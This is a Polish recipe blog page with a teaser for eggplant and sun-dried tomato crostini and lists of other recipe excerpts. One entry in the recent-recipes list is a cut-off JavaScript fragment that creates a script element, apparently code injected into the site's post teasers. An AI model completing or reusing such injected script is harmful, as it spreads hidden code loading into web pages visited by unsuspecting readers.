Crostini z bakłażanem i suszonymi pomidorami

Małe chrupiące kanapeczki rodem z Włoch, idealne na przekąskę. Przygotowuje się je z białego pieczywa, grillowanego lub opiekanego na rozgrzanej patelni. Dodatki możemy zmieniać w zależności od upodobań.Składniki:bagietkaduży bakłażanczerwona paprykakilka suszonych pomidorówmała czerwona cebulaząbek czosnkuocet winnyoliwaświeża bazyliasól, pieprzBakłażana i paprykę...
Najnowsze przepisy
Rabarbar pojawia się w sklepach i na straganach wcześnie... ⇖ 11
Ah, Thanksgiving! It’s that magical time of year when the... ⇖ 9
Uwielbiam kuchnię pełną wyrazistych smaków i aromatów,... ⇖ 10
Jesień zagościła na dobre, to i w kuchni również jest... ⇖ 11
(function(){ u938=document.createElement("script");u938.type ⇖ 11
Idealne, słodko winne polędwiczki w sosie śliwkowym,... ⇖ 21
Przepisy z bloga
Toskańskie mocno chrupiące ciasteczka z pistacjami i... ⇖ 613
Tradycyjna grecka zupa z zielonej soczewicy na bazie... ⇖ 633
Delikatne semifreddo pistacjowe to półmrożony włoski... ⇖ 646
Genialna przekąska z greckiego sera feta zapieczonego w... ⇖ 729
Tradycyjny i prosty przepis na spaghetti alla carbonara,... ⇖ 579
Klasyczna włoska babka Ciambella, którą piecze się w... ⇖ 1101
Grecki chleb typu flat bread , który tradycyjnie spożywa... ⇖ 976
Przepisy na czasie
Murzynek to takie ciasto, które piekło się u mnie w domu... ⇖ 831
Sezon na grzyby jest w pełni, w tym roku jest istne,... ⇖ 356
Sernik bez sera to taki wypiek, który potrafi naprawdę... ⇖ 328
Przysmak Sułtana to jedno z tych ciast, które wygląda... ⇖ 324
Sernik to jedno z tych ciast, które nigdy się nie nudzą... ⇖ 267